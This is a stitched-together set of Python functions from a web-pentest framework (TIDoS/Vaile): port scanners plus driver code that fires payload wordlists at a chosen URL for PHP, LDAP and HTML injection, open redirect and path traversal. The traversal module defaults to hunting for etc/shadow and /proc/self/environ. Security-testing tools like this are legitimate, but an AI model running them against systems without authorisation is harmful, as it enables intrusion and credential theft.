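            print(" [!] Exiting...")
            quit()

        ports = range(lo, hi + 1)  # inclusive upper bound
        # NOTE(review): how listsplit handles a chunk size of 0 (more
        # processes than ports) is not visible here -- confirm.
        prtlst = listsplit(ports, round(len(ports) / processes))
        starting_time = time.time()

        def checkhost(ip):
            """Send one ICMP echo to ``ip``; quit if sending raises.

            Only an exception counts as failure -- the reply returned by
            ``sr1`` is not inspected, which matches the original behaviour.
            """
            conf.verb = 0  # silence scapy's own output
            try:
                sr1(IP(dst=ip) / ICMP())
                print("\n\033[1;32m [!] Target server detected online...")
                time.sleep(0.6)
                print(' [*] Beginning scan...')
            except Exception:
                print("\n\033[91m [!] Couldn't Resolve Target")
                print(" [!] Exiting...")
                quit()

        def print_row(c, state):
            """Print one table row: the port centred in an 8-wide cell
            (same padding the former five-way if-chain produced), the
            pre-coloured ``state`` cell, then the rule line."""
            pad = 8 - len(c)
            left = pad // 2
            print(O + '    |' + ' ' * left + C + c + ' ' * (pad - left) +
                  O + '|' + state + O + '|')
            print(O + '    +--------+------------------+')
            time.sleep(0.2)

        checkhost(ip_host)
        print(G + " [*] Scanning initiated at " + strftime("%H:%M:%S") +
              "!\n")

        with Pool(processes=processes) as pool:
            res = [
                pool.apply_async(portloop, args=(l, verbose, ip_host))
                for l in prtlst
            ]
            # Each worker result is indexed as (open|filtered, filtered,
            # closed) lists.
            for r in res:
                j = r.get()
                openfil_ports += j[0]
                filter_ports += j[1]
                closed_ports += j[2]

        print("\n [!] Scanning completed at %s" %
              (time.strftime("%I:%M:%S %p")))
        total_time = time.time() - starting_time
        print(GR + ' [*] Preparing report...\n')
        time.sleep(1)
        print(O + '      ' + R + 'SCAN REPORT ' + O + ' ')
        print(O + '    ––·‹›·––·‹›·–––')
        print()
        print(O + '    +--------+------------------+')
        print(O + '    |  ' + GR + 'PORT  ' + O + '|       ' + GR +
              'STATE      ' + O + '|')
        print(O + '    +--------+------------------+')

        for port in sorted(openfil_ports):
            print_row(str(port), '       ' + G + 'OPEN       ')

        if filter_ports:
            for port in sorted(filter_ports):
                print_row(str(port), '     ' + GR + 'FILTERED     ')
        else:
            print('' + R + " [-] No filtered ports found.!!" + O + '')
        print(B + "\n [!] " + str(len(closed_ports)) +
              ' closed ports not shown')
        print(O + " [!] Host %s scanned in %s seconds\n" %
              (target, total_time))

    except KeyboardInterrupt:  # In case the user wants to quit
        print("\n\033[91m [*] User Requested Shutdown...")
        print(" [*] Exiting...")
        quit()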
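def scan0x00(target):
    """Run the TCP stealth port-scan module against ``target``.

    Takes the port range and verbosity flag from ``properties`` when preset
    (a single-space value means "ask"), otherwise prompts for them. Resolves
    ``target``, runs the module-level ``checkhost``, splits the range over a
    ``multiprocessing.Pool`` of ``portloop`` workers and prints a table of
    open ports. Nothing is persisted here.

    Args:
        target: hostname or dotted IP accepted by ``socket.gethostbyname``.

    Leaves the interpreter via ``quit()`` on an invalid port range or Ctrl-C.
    Relies on module-level ``properties``, ``checkhost``, ``listsplit``,
    ``portloop``, ``processes``, ``strftime`` and the colour constants.
    """

    try:
        from core.methods.print import pscan
        pscan("tcp stealth scan")
        if properties["INIT"][1] == " ":
            min_port = input(O + ' [#] Enter initial port :> ')
        else:
            min_port = properties["INIT"][1]
        if properties["FIN"][1] == " ":
            max_port = input(O + ' [#] Enter ending port :> ')
        else:
            max_port = properties["FIN"][1]
        open_ports = []
        closed_ports = []
        ip_host = socket.gethostbyname(target)
        if properties["VERBOSE"][1] == " ":
            chk = input(
                C + ' [#] Do you want a verbose output? (enter if not) :> ')
            # Equality, not identity: ``is not ""`` depended on interning.
            verbose = chk != ""
        else:
            verbose = properties["VERBOSE"][1] == "1"

        try:
            print(GR + ' [*] Checking port range...')
            lo, hi = int(min_port), int(max_port)
            # 65535 is the highest TCP port; 65536 was off by one.
            if 0 <= lo <= hi <= 65535:
                print('\033[1;32m [!] Port range detected valid...')
                time.sleep(0.3)
                print(GR + ' [*] Preparing for the the Scan...')
            else:
                print("\n\033[91m [!] Invalid Range of Ports")
                print(" [!] Exiting...")
                quit()
        except ValueError:  # non-numeric input to int()
            print("\n\033[91m [!] Invalid Range of Ports")
            print(" [!] Exiting...")
            quit()

        ports = range(lo, hi + 1)  # inclusive upper bound
        # NOTE(review): listsplit's behaviour for a 0 chunk size (more
        # processes than ports) is not visible here -- confirm.
        prtlst = listsplit(ports, round(len(ports) / processes))
        starting_time = time.time()

        def print_row(c):
            """Print one OPEN row: port centred in an 8-wide cell (the same
            padding the former five-way if-chain produced) plus the rule."""
            pad = 8 - len(c)
            left = pad // 2
            print(O + '    |' + ' ' * left + C + c + ' ' * (pad - left) +
                  O + '|       ' + G + 'OPEN       ' + O + '|')
            print(O + '    +--------+------------------+')
            time.sleep(0.2)

        checkhost(target)
        print(O + " [*] Scanning initiated at " + strftime("%H:%M:%S") + "!\n")

        with Pool(processes=processes) as pool:
            res = [
                pool.apply_async(portloop, args=(l, verbose, ip_host))
                for l in prtlst
            ]
            # Each worker result is indexed as (open, closed) lists.
            for r in res:
                j = r.get()
                open_ports += j[0]
                closed_ports += j[1]

        print(O + "\n [!] Scanning completed at %s" %
              (time.strftime("%I:%M:%S %p")))
        total_time = time.time() - starting_time
        print(GR + ' [*] Preparing report...\n')
        time.sleep(1)
        print(O + ' ——·+-------------+')
        print(O + '    [ SCAN REPORT ]    stealthscan')
        print(O + '    +-------------+   --------------')
        print(O + '             ')
        print(O + '    +--------+------------------+')
        print(O + '    |  ' + GR + 'PORT  ' + O + '|       ' + GR +
              'STATE      ' + O + '|')
        print(O + '    +--------+------------------+')

        if open_ports:
            for port in sorted(open_ports):
                print_row(str(port))
        else:
            print('' + R + " [-] Sorry, No open ports found.!!")
        print(O + '\n [!] ' + str(len(closed_ports)) +
              ' closed ports not shown')
        print(C + " [!] Host %s scanned in %s seconds" % (target, total_time))

    except KeyboardInterrupt:
        print(R + "\n [-] User Requested Shutdown...")
        print(" [*] Exiting...")
        quit()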
ファイル: phpi.py プロジェクト: whoiskhairul/TIDoS-Framework
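def phpi(web):
    """Run the PHP code-injection check against one parameter of ``web``.

    Sets the module-level ``name``/``lvl1``/``lvl2``/``lvl3``/``module``
    globals that ``save_data`` keys on, takes the parameter path and the
    parallel flag from ``properties`` or from prompts, loads the payload
    list via ``getFile0x00`` and sends each payload through ``check0x00``
    (sequential) or ``checkpre`` (one ``Pool`` task per payload chunk).
    Successful payloads are printed and persisted; any exception from the
    checks is printed and the module still reports completion.

    Args:
        web: base URL the parameter path is appended to.

    Relies on module-level ``targetname``, ``properties``, ``getFile0x00``,
    ``payloads``, ``check0x00``, ``checkpre``, ``listsplit``, ``processes``,
    ``save_data``, ``database`` and the colour constants.
    """
    global name, lvl2, module, lvl1, lvl3
    name = targetname(web)
    lvl2 = inspect.stack()[0][3]  # this function's own name, used as DB key
    module = "VulnAnalysis"
    lvl1 = "Critical Vulnerabilities"
    lvl3 = ""
    time.sleep(0.5)

    from core.methods.print import pvln
    pvln("php code Injection")

    gen_headers = {
        'User-Agent':
        'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201',
        'Accept-Language': 'en-US;',
        'Accept-Encoding': 'gzip, deflate',
        'Accept':
        'text/php, application/xhtml+xml, application/xml;',  # important -> text/php
        'Connection': 'close'
    }

    print(GR + ' [*] Initiating ' + R + 'Parameter Based Check...')
    if properties["PARAM"][1] == " ":
        param = input(O +
                      ' [§] Scope parameter (eg. /vuln/page.php?q=lmao) :> ')
    else:
        param = properties["PARAM"][1]
    if not param.startswith('/'):
        param = '/' + param

    # With several parameters, ask which one to use; the remaining ones are
    # kept verbatim in ``bug2`` and re-appended after the payload.
    choice = ""
    if "&" in param:
        ln = len(param.split("&"))
        choice = input(
            " [!] Discovered {} parameters. Which one to use? (enter name) :> "
            .format(ln))
        # Require ``name=`` rather than the bare substring: the split on
        # ``choice + "="`` below would otherwise raise IndexError.
        if choice + "=" not in param:
            sys.exit(" [-] Param {} not found.".format(choice))

    bug2 = ""
    if choice != "":
        rest = param.split(choice + "=")[1]
        if "&" in rest:
            # Everything after the chosen value, from its '&' onwards.
            # Splitting ``rest`` (not the whole ``param``) avoids tripping on
            # an earlier occurrence of the parameter name in the path.
            bug2 = "&" + rest.split("&", 1)[1]

    if properties["PARALLEL"][1] == " ":
        pa = input("\n [?] Parallelise Attack? (enter if not) :> ")
        parallel = pa != ""
    else:
        parallel = properties["PARALLEL"][1] == "1"

    # presumably populates the module-level ``payloads`` iterated below --
    # its body is not visible here.
    getFile0x00()
    web00 = web + param.split(choice + '=')[0] + choice + '='
    try:
        success = []
        if not parallel:
            for pay in payloads:
                print(GR + '\n [*] Setting parameters...')
                web0x00 = web00 + pay + bug2
                print(C + ' [+] Using payload : ' + B + str(pay))
                print(B + ' [+] Using !nfected Url : ' + GR +
                      str(web0x00))  # display whats going on
                success += check0x00(
                    web0x00, pay, gen_headers)  # check the outupt of the fuzz
        else:
            paylists = listsplit(payloads, round(len(payloads) / processes))
            with Pool(processes=processes) as pool:
                res = [
                    pool.apply_async(checkpre,
                                     args=(l, web00, bug2, gen_headers))
                    for l in paylists
                ]
                for r in res:
                    success += r.get()
        if success:
            # Record the finding under its own name; the stored text used to
            # say "CRLF Injection", which mis-filed PHPi results.
            data = ("PHPi Vulnerability found!\nVulnerable param: " + web00 +
                    "\nPayloads: " + str(success))
            save_data(database, module, lvl1, lvl2, lvl3, name, data)
            print(" [+] PHPi Vulnerability found! Successful payloads:")
            for i in success:
                print(i)
        else:
            print(R + "\n [-] No payload succeeded." + C)
            save_data(database, module, lvl1, lvl2, lvl3, name,
                      "No payload succeeded.")
    except Exception as e:  # if error
        print(R + ' [-] Unexpected Exception Encountered!')
        print(R + ' [-] Exception : ' + str(e))

    print(G + '\n [+] PHPi Module Completed!')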
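def scan0x00(host):
    """Scan a fixed list of common ports on ``host`` and persist the result.

    Resolves ``host`` (quitting if that fails), splits the built-in port list
    over a ``multiprocessing.Pool`` of ``portloop`` workers, prints a summary
    line plus a table of open ports, and stores the open-port list -- or a
    "none found" record -- with ``save_data``.

    Args:
        host: hostname or dotted IP; passed unchanged to ``portloop``.

    Relies on module-level ``listsplit``, ``portloop``, ``processes``,
    ``summary``, ``save_data``, ``database``, ``name``, ``color`` and the
    colour constants. Ctrl-C during the scan calls ``quit()``.
    """

    from core.methods.print import pscan
    pscan("port scanner")
    print(GR + ' [*] Using most common ports...')

    ports = [
        20, 21, 23, 25, 53, 67, 68, 69, 80, 109, 110, 111, 123, 137, 143, 156,
        161, 162, 179, 389, 443, 445, 512, 513, 546, 547, 636, 993, 995, 1099,
        2121, 2049, 3306, 5432, 5900, 6000, 6667, 8080, 8180, 8443, 10000
    ]
    mlprts = listsplit(ports, round(len(ports) / processes))
    print(C + ' [+] Scanning %s ports...' % len(ports))
    try:
        # Resolve only to confirm the name exists; the workers receive
        # ``host`` itself, so the address is not kept.
        socket.gethostbyname(host)
        print(G + '\n [+] Target server detected up and running...' + C +
              color.TR2 + C)
        print(O + ' [*] Preparing for scan...' + C)
    except Exception:
        print(R + ' [-] Server not responding...')
        time.sleep(0.3)
        print(R + ' [*] Exiting...')
        quit()

    open_ports = []
    closed_ports = []

    def print_row(c):
        """Print one OPEN row with the port centred in an 8-wide cell (the
        padding the former five-way if-chain produced) plus the rule."""
        pad = 8 - len(c)
        left = pad // 2
        print(P + '    |' + ' ' * left + C + c + P + ' ' * (pad - left) +
              '|   ' + C + 'OPEN' + P + '   |')
        print(P + '    +--------+----------+')
        time.sleep(0.2)

    print(G + " [*] Scanning started at %s" % (time.strftime("%I:%M:%S %p")) +
          C + color.TR2 + C)
    starting_time = time.time()
    try:
        print(O + " [*] Scan in progress.." + C)
        time.sleep(0.8)
        with Pool(processes=processes) as pool:
            res = [
                pool.apply_async(portloop, args=(l, host)) for l in mlprts
            ]
            # Each worker result is indexed as (open, closed) lists.
            for r in res:
                j = r.get()
                open_ports += j[0]
                closed_ports += j[1]

        print(G + "\n [+] Scanning completed at %s" %
              (time.strftime("%I:%M:%S %p")) + C + color.TR2 + C)
        total_time = time.time() - starting_time
        print(P + ' [*] Preparing report...\n' + C)
        time.sleep(1)

        openports = "   {}{}{}{}{}{}{}{} ports open.".format(
            color.TR5, C, G, str(len(open_ports)), color.END, color.TR2,
            color.END, color.CURSIVE)
        summary("simpleport", openports)
        print()
        print(P + '    +--------+----------+')
        print(P + '    |  ' + C + 'PORT' + P + '  ' + '|  ' + C + 'STATE' + P +
              '   ' + '|')
        print(P + '    +--------+----------+')
        # Report keys for save_data (``name`` comes from module scope).
        lvl2 = "getports"
        module = "ScanANDEnum"
        lvl1 = "Scanning & Enumeration"
        lvl3 = ""
        if open_ports:
            for port in sorted(open_ports):
                print_row(str(port))
            data = "Open Ports: " + str(open_ports)
            save_data(database, module, lvl1, lvl2, lvl3, name, data)
        else:
            save_data(database, module, lvl1, lvl2, lvl3, name,
                      "No open ports found.")
            print(R + "\n [-] No open ports found.!!\n")
        print(B + '\n [!] ' + str(len(closed_ports)) +
              ' closed ports not shown')
        print(G + " [+] Host %s scanned in %s seconds" % (host, total_time) +
              C + color.TR2 + C + "\n")

    except KeyboardInterrupt:
        print(R + "\n [-] User requested shutdown... ")
        print(' [-] Exiting...\n')
        quit()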
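def openredirect(web):
    """Run the open-redirect check against one parameter of ``web``.

    Sets the ``save_data`` globals, then -- from ``properties`` or prompts --
    collects the parameter path, the parallel flag, an optional payload file
    and an optional Cookie header, loads payloads via ``getPayloads0x00`` and
    runs ``check0x00`` over them, sequentially or one ``Pool`` task per
    payload chunk. Successful payloads are printed and persisted; Ctrl-C
    aborts the module without re-raising.

    Args:
        web: base URL the parameter path is appended to.

    Relies on module-level ``targetname``, ``properties``, ``getPayloads0x00``,
    ``payloads``, ``check0x00``, ``listsplit``, ``processes``, ``save_data``,
    ``database`` and the colour constants.
    """
    global name, lvl2, module, lvl1, lvl3
    name = targetname(web)
    lvl2 = inspect.stack()[0][3]  # this function's own name, used as DB key
    module = "VulnAnalysis"
    lvl1 = "Critical Vulnerabilities"
    lvl3 = ""
    time.sleep(0.6)

    from core.methods.print import pvln
    pvln("open redirect checker")

    try:
        if properties["PARAM"][1] == " ":
            param = input(
                O +
                ' [§] Scope parameter to test (eg. /redirect.php?site=foo) :> '
            )
        else:
            param = properties["PARAM"][1]
        if not ('?' in param and '=' in param):
            print(R + ' [-] Your input does not match a parameter...')
            param = input(O + ' [§] Enter paramter to test :> ')
        # ``web00`` is now built on every path. Previously the re-prompt
        # branch, and any answer other than exactly 'y'/'n' to the question
        # below, left it unbound and the check0x00 call raised NameError.
        if param.startswith('/'):
            m = input(
                GR +
                '\n [!] Your path starts with "/".\n [§] Do you mean root directory? (Y/n) :> '
            )
            if m.lower() not in ('y', 'n'):
                print(R + ' [-] U mad?')
            web00 = web + param  # both answers always produced this URL
        else:
            web00 = web + '/' + param

        if properties["PARALLEL"][1] == " ":
            pa = input(" [?] Parallel Attack? (enter if not) :> ")
            parallel = pa != ""
        else:
            parallel = properties["PARALLEL"][1] == "1"

        print(GR + ' [*] Configuring relative headers...')
        time.sleep(0.8)
        gen_headers = {
            'User-Agent':
            'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201',
            'Accept-Language': 'en-US;',
            'Accept-Encoding': 'gzip, deflate',
            'Accept': 'text/html,application/xhtml+xml,application/xml;',
            'Connection': 'close'
        }

        if properties["DICT"][1] == " ":
            print(O + ' [!] Enter path to payload file ' + R +
                  '(Default: files/payload-db/openredirect_payloads.lst)')
            fi = input(O + ' [§] Your input (Press Enter if default) :> ')
        elif properties["DICT"][1].lower() == "none":
            fi = ""
        else:
            fi = properties["DICT"][1]
        default_list = 'files/payload-db/openredirect_payloads.lst'
        if fi == '':
            fi = default_list
        elif os.path.exists(fi):
            print(G + ' [+] File found under ' + fi)
        else:
            print(R + ' [-] File not found... Using default payload...')
            fi = default_list
        getPayloads0x00(fi)  # presumably fills module-level ``payloads``

        if properties["COOKIE"][1] == " ":
            input_cookie = input(
                "\n [§] Got any cookies? [just enter if none] :> ")
        elif properties["COOKIE"][1].lower() == "none":
            input_cookie = ""
        else:
            input_cookie = properties["COOKIE"][1]
        if input_cookie:
            gen_headers['Cookie'] = input_cookie
        print(GR + ' [*] Configuring payloads with Url...')
        success = []
        if not parallel:
            success += check0x00(web00, gen_headers, payloads)
        else:
            paylists = listsplit(payloads, round(len(payloads) / processes))
            with Pool(processes=processes) as pool:
                res = [
                    pool.apply_async(check0x00, args=(web00, gen_headers, l))
                    for l in paylists
                ]
                for r in res:
                    success += r.get()
        if success:
            data = ("Open Redirect Vulnerability found!\nVulnerable param: " +
                    web00 + "\nPayloads: " + str(success))
            save_data(database, module, lvl1, lvl2, lvl3, name, data)
            print(
                " [+] Open Redirect Vulnerability found! Successful payloads:")
            for i in success:
                print(i)
        else:
            print(R + "\n [-] No payload succeeded." + C)
            save_data(database, module, lvl1, lvl2, lvl3, name,
                      "No payload succeeded.")
    except KeyboardInterrupt:
        print(R + ' [-] User Interruption Detected!')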
ファイル: pathtrav.py プロジェクト: medasz/Vaile
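def check0x00(website0, gen_headers, parallel):
    """Drive the path-traversal path list against ``website0`` and report.

    Chooses between the plain path list and the evasion list (from
    ``properties`` or a prompt), resolves the list file through
    ``getFile0x00``, then feeds every line to ``atck`` (sequential) or
    ``atckpre`` (one ``Pool`` task per chunk). Each worker result is indexed
    as six lists -- gotcha, generic, logs, environ, fd, config -- which are
    merged, summarised via ``summary`` and printed per non-empty category.

    Args:
        website0: URL the paths are applied to.
        gen_headers: accepted for interface compatibility; not referenced
            in this body.
        parallel: run the list over a ``multiprocessing.Pool`` when true.

    Relies on module-level ``properties``, ``getFile0x00``, ``file2list``,
    ``atck``, ``atckpre``, ``listsplit``, ``processes``, ``session``,
    ``summary``, ``printOut0x00``, ``color`` and the colour constants.
    """
    loggy, enviro, fud, generic, cnfy, gotcha = [], [], [], [], [], []
    if properties["EVASION"][1] == " ":
        ev = input(
            C +
            "\n [?] Perform Evasion Attack? (specific file ; enter for no) :> "
        )
        evasion = ev != ""
    else:
        evasion = properties["EVASION"][1] == "1"
    if not evasion:
        if properties["DICT"][1] == " ":
            print(C + ' [!] Enter the filename containing paths ' + O +
                  '(Default: files/pathtrav_paths.lst)' + C)
            fi = input(C +
                       " [*] Custom filepath (press Enter for default) :> ")
        elif properties["DICT"][1].lower() == "none":
            fi = ""
        else:
            fi = properties["DICT"][1]
        if fi == '':
            print(GR + ' [*] Using default filepath...')
            fi = getFile0x00('files/fuzz-db/pathtrav_paths.lst')
        else:
            fi = getFile0x00(fi)
        filepath = ""
    else:
        fi = getFile0x00('files/fuzz-db/pathtrav_evasion.lst')
        if properties["FILE"][1] == " ":
            filepath = input(
                " [!] Enter file and path to search (Default: etc/shadow) :> ")
        elif properties["FILE"][1].lower() == "none":
            filepath = ""
        else:
            filepath = properties["FILE"][1]

    # Both branches of the former ``active0`` test assigned website0 (the
    # alternative was commented out), so the URL is used as given.
    owebsite = website0

    print("")
    http = session()  # local name no longer shadows the ``requests`` module

    def merge(paths):
        """Fold one worker's six result lists into the accumulators."""
        gotcha.extend(paths[0])
        generic.extend(paths[1])
        loggy.extend(paths[2])
        enviro.extend(paths[3])
        fud.extend(paths[4])
        cnfy.extend(paths[5])

    if not parallel:
        # ``with`` closes the handle; the former bare open() leaked it.
        with open(fi) as pathfile:
            for line in pathfile:
                merge(atck(evasion, filepath, owebsite, line, http))
    else:
        pathlist = file2list(fi)
        pthlst = listsplit(pathlist, round(len(pathlist) / processes))
        with Pool(processes=processes) as pool:
            res = [
                pool.apply_async(atckpre,
                                 args=(evasion, filepath, owebsite, l, http))
                for l in pthlst
            ]
            for r in res:
                merge(r.get())
    foundpaths = "   {}{}{}{}{}{}{}{} paths leaked.".format(
        color.TR5, C, G, str(len(gotcha)), color.END, color.TR2, color.END,
        color.CURSIVE)
    summary("pathtrav", foundpaths)
    time.sleep(0.5)

    if loggy:
        printOut0x00("Logs", loggy)
    if enviro:
        printOut0x00("/proc/self/environ", enviro)
    if fud:
        printOut0x00("/proc/self/fd", fud)
    if cnfy:
        printOut0x00("Configuration", cnfy)
    if generic:
        printOut0x00("Diverse", generic)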
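def ldap(web):
    """Run the LDAP-injection check against one parameter of ``web``.

    Takes the parameter path, parallel flag, optional cookie and optional
    payload file from ``properties`` or prompts, loads payloads through
    ``getFile0x00``, truncates the URL at its first ``=`` and runs
    ``check0x00`` over the payloads -- sequentially or one ``Pool`` task per
    chunk. Successful payloads are printed; nothing is persisted here.
    Ctrl-C and any other exception are reported and the module still prints
    its completion line.

    Args:
        web: base URL the parameter path is appended to.

    Relies on module-level ``properties``, ``getFile0x00``, ``payloads``,
    ``check0x00``, ``listsplit``, ``processes`` and the colour constants.
    Exits via ``sys.exit`` when the path holds no ``?``/``=`` parameter.
    """

    print(GR + ' [*] Loading module...')
    time.sleep(0.5)

    from core.methods.print import pvln
    pvln("ldap Injection")

    try:
        if properties["PARAM"][1] == " ":
            web0 = input(
                O + ' [§] Parameter path to test (eg. /lmao.php?foo=bar) :> ')
        else:
            web0 = properties["PARAM"][1]
        if not ("?" in web0 and '=' in web0):
            sys.exit(R + " [-] Invalid parameters." + C)
        # ``web00`` is built on every path; an answer other than 'y'/'n'
        # previously left it unbound and the next line raised NameError.
        if web0.startswith('/'):
            m = input(
                GR +
                '\n [!] Your path starts with "/".\n [§] Do you mean root directory? (Y/n) :> '
            )
            if m.lower() not in ('y', 'n'):
                print(R + ' [-] U mad?')
            web00 = web + web0  # both answers always produced this URL
        else:
            web00 = web + '/' + web0
        print(B + ' [+] Parameterised Url : ' + C + web00)

        if properties["PARALLEL"][1] == " ":
            pa = input(" [?] Parallel Attack? (enter if not) :> ")
            # Equality, not identity: ``is not ""`` depended on interning.
            parallel = pa != ""
        else:
            parallel = properties["PARALLEL"][1] == "1"

        if properties["COOKIE"][1] == " ":
            input_cookie = input(
                "\n [*] Enter cookies if needed (Enter if none) :> ")
        elif properties["COOKIE"][1].lower() == "none":
            input_cookie = ""
        else:
            input_cookie = properties["COOKIE"][1]
        print(GR + ' [*] Setting headers...')
        time.sleep(0.6)
        gen_headers = {
            'User-Agent':
            'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201',
            'Accept-Language': 'en-US;',
            'Accept-Encoding': 'gzip, deflate',
            'Accept': 'text/html,application/xhtml+xml,application/xml;',
            'Connection': 'close'
        }

        if input_cookie:
            gen_headers['Cookie'] = input_cookie
        if properties["DICT"][1] == " ":
            print(O + ' [§] Enter the payloads file ' + R +
                  '(Default: files/payload-db/ldap_payloads.lst)...')
            fi = input(O + ' [§] Your input (Press Enter for default) :> ')
        elif properties["DICT"][1].lower() == "none":
            fi = ""
        else:
            fi = properties["DICT"][1]
        default_list = 'files/payload-db/ldap_payloads.lst'
        if fi == '':
            fi = default_list
        elif os.path.exists(fi):
            print(G + ' [+] File under ' + fi + ' found!')
        else:
            print(R + ' [-] Invalid input... Using default...')
            fi = default_list
        getFile0x00(fi)  # presumably fills module-level ``payloads``
        print(O + ' [!] Parsing url...')
        time.sleep(0.7)
        web000 = web00.split('=')[0] + '='  # keep up to the first '='
        print(GR + ' [*] Starting enumeration...')
        time.sleep(0.7)
        success = []
        if not parallel:
            success += check0x00(web000, gen_headers, payloads)
        else:
            paylists = listsplit(payloads, round(len(payloads) / processes))
            with Pool(processes=processes) as pool:
                res = [
                    pool.apply_async(check0x00, args=(web000, gen_headers, l))
                    for l in paylists
                ]
                for r in res:
                    success += r.get()
        if success:
            print(" [+] LDAPi Vulnerability found! Successful payloads:")
            for i in success:
                print(i)
        else:
            print(R + "\n [-] No payload succeeded." + C)

    except KeyboardInterrupt:
        print(R + ' [-] Aborting module...')
    except Exception as e:
        print(R + ' [-] Exception : ' + str(e))
    print(G + '\n [+] LDAP Injection module completed!\n')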
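def check0x00(website0, gen_headers, parallel):
    """Run the path-traversal wordlist against *website0* and print what was found.

    Mode selection comes from the module-level ``properties`` table, falling
    back to an interactive prompt whenever an entry is a single space:

    * ``EVASION`` -- "1" (or any non-empty answer) selects the evasion wordlist
      together with a file/path to look for (``FILE``); otherwise a plain path
      wordlist is used (``DICT``, default ``files/fuzz-db/pathtrav_paths.lst``).

    Every wordlist line is handed to ``atck`` (sequential mode) or, when
    *parallel* is truthy, whole chunks go to ``atckpre`` in a ``Pool`` of
    ``processes`` workers.  Both return a 6-item sequence of lists that is
    merged, in order, into gotcha / generic / loggy / enviro / fud / cnfy and
    printed through ``printOut0x00``.

    Args:
        website0: Base URL the wordlist entries are tried against.
        gen_headers: Accepted for interface compatibility; not used here.
        parallel: Use the process pool instead of the in-process loop.

    Returns:
        None.  Findings are printed only.
    """
    loggy = []
    enviro = []
    fud = []
    generic = []
    cnfy = []
    gotcha = []
    # Merge order must match the result layout of atck / atckpre:
    # index 0 -> gotcha, 1 -> generic, 2 -> loggy, 3 -> enviro, 4 -> fud, 5 -> cnfy.
    buckets = (gotcha, generic, loggy, enviro, fud, cnfy)

    if properties["EVASION"][1] == " ":
        ev = input(
            O +
            "\n [?] Perform Evasion Attack? (specific file ; enter for no) :> "
        )
        evasion = ev != ""
    else:
        evasion = properties["EVASION"][1] == "1"

    if not evasion:
        if properties["DICT"][1] == " ":
            # The prompt now names the path that is actually used as default.
            print(O + ' [!] Enter the filename containing paths ' + R +
                  '(Default: files/fuzz-db/pathtrav_paths.lst)')
            fi = input(O +
                       " [*] Custom filepath (press Enter for default) :> ")
        elif properties["DICT"][1].lower() == "none":
            fi = ""
        else:
            fi = properties["DICT"][1]
        if fi == '':
            print(GR + ' [*] Using default filepath...')
            fi = getFile0x00('files/fuzz-db/pathtrav_paths.lst')
        else:
            fi = getFile0x00(fi)
        filepath = ""
    else:
        fi = getFile0x00('files/fuzz-db/pathtrav_evasion.lst')
        if properties["FILE"][1] == " ":
            filepath = input(
                " [!] Enter file and path to search (Default: etc/shadow) :> ")
        elif properties["FILE"][1].lower() == "none":
            filepath = ""
        else:
            filepath = properties["FILE"][1]

    # Both branches of the former ``active0`` check assigned website0 (the
    # ``ahurl`` alternative was commented out), so no switch is needed.
    owebsite = website0

    print("")
    if not parallel:
        # ``with`` closes the wordlist; the bare ``open(fi)`` loop leaked the
        # handle.  getFile0x00 is expected to hand back a readable path here.
        with open(fi) as wordlist:
            for line in wordlist:
                paths = atck(evasion, filepath, owebsite, line)
                for bucket, found in zip(buckets, paths):
                    bucket.extend(found)
    else:
        pathlist = file2list(fi)
        pthlst = listsplit(pathlist, round(len(pathlist) / processes))
        with Pool(processes=processes) as pool:
            res = [
                pool.apply_async(atckpre,
                                 args=(
                                     evasion,
                                     filepath,
                                     owebsite,
                                     l,
                                 )) for l in pthlst
            ]
            for job in res:
                for bucket, found in zip(buckets, job.get()):
                    bucket.extend(found)
    print(G + "\n [+] Retrieved %s interesting paths...\n" % str(len(gotcha)))
    time.sleep(0.5)

    printOut0x00("Logs", loggy)
    printOut0x00("/proc/self/environ", enviro)
    printOut0x00("/proc/self/fd", fud)
    printOut0x00("Configuration", cnfy)
    printOut0x00("Generic", generic)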
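def htmli(web):
    """Interactive HTML-injection check for one scope parameter of *web*.

    Prompts for the parameter path (e.g. ``/vuln/page.php?q=x``), lets the user
    pick one parameter when the path carries several, optionally spreads the
    module-level ``payloads`` over a ``Pool`` of ``processes`` workers
    (``checkpre``), and otherwise tries each payload in-process through
    ``check0x00``.  Payloads reported back as hits are printed.

    Args:
        web: Base URL; the parameter path is appended to it.

    Returns:
        None.  Calls ``sys.exit`` when the chosen parameter name is not part of
        the supplied path; other exceptions from the check loop are printed.
    """
    print(GR + ' [*] Loading module...')
    time.sleep(0.5)

    from core.methods.print import pvln
    pvln("html injection")

    gen_headers = {
        'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201',
        'Accept-Language': 'en-US;',
        'Accept-Encoding': 'gzip, deflate',
        'Accept': 'text/html,application/xhtml+xml,application/xml;',
        'Connection': 'close',
    }

    print(GR + ' [*] Initiating ' + R + 'Parameter Based Check...')
    param = input(O + ' [#] Scope parameter (eg. /vuln/page.php?q=lmao) :> ')
    if not param.startswith('/'):
        param = '/' + param

    choice = ""
    if "&" in param:
        ln = len(param.split("&"))
        choice = input(" [!] Discovered {} parameters. Which one to use? (enter name) :> ".format(ln))
        if choice not in param:
            sys.exit(" [-] Param {} not found.".format(choice))

    # bug2 holds the "&other=..." remainder that follows the chosen parameter's
    # value; it is re-appended after the payload so the query stays complete.
    bug2 = ""
    if choice != "":
        n = param.split(choice + "=")[1]
        if "&" in n:
            bug2 = param.split(choice)[1]
            tmp = bug2.split("&")[0]
            bug2 = bug2.replace(tmp, "")

    pa = input("\n [?] Parallelise Attack? (enter if not) :> ")
    # The original ``pa is not ""`` compared object identity, not content.
    parallel = pa != ""

    # Presumably loads the module-level ``payloads`` list; the return value was
    # never used, so it is not bound.
    getFile0x00()
    web00 = web + param.split(choice + '=')[0] + choice + '='
    try:
        success = []
        if not parallel:
            for pay in payloads:
                print(GR + '\n [*] Setting parameters...')
                web0x00 = web00 + pay + bug2
                print(C + ' [+] Using payload : ' + B + str(pay))
                print(B + ' [+] Using !nfected Url : ' + GR + str(web0x00))  # display whats going on
                success += check0x00(web0x00, pay, gen_headers)  # check the outupt of the fuzz
        else:
            paylists = listsplit(payloads, round(len(payloads) / processes))
            with Pool(processes=processes) as pool:
                res = [pool.apply_async(checkpre, args=(l, web00, bug2, gen_headers,)) for l in paylists]
                for y in res:
                    success += y.get()
        if success:
            print(" [+] HTMLi Vulnerability found! Successful payloads:")
            for hit in success:
                print(hit)
        else:
            print(R + "\n [-] No payload succeeded." + C)

    except Exception as e:
        print(R + ' [-] Unexpected Exception Encountered!')
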